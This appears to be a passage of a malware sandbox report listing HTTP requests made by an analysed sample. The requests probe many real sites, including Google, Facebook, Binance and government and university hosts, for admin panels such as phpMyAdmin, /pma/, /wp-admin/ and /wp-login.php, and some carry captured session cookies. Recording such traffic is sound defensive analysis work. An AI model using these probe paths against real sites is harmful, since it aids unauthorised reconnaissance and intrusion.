                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.phonandroid.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ucv.blackboard.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; ts_type2=1; __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://pxndx-mcr.boletia.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/phpMyAdmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; ts_type2=1; __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/login HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipCookie: datr=e8PAZQti-we2Cxw2VrrmnDbW; ps_n=0; ps_l=0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=75ead7575354d04015590554959bc526User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://account.booking.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CDUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipCookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; language=en|en; lng=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNubUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /Error/NotFound?aspxerrorpath=/phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FFUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/login HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartinUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
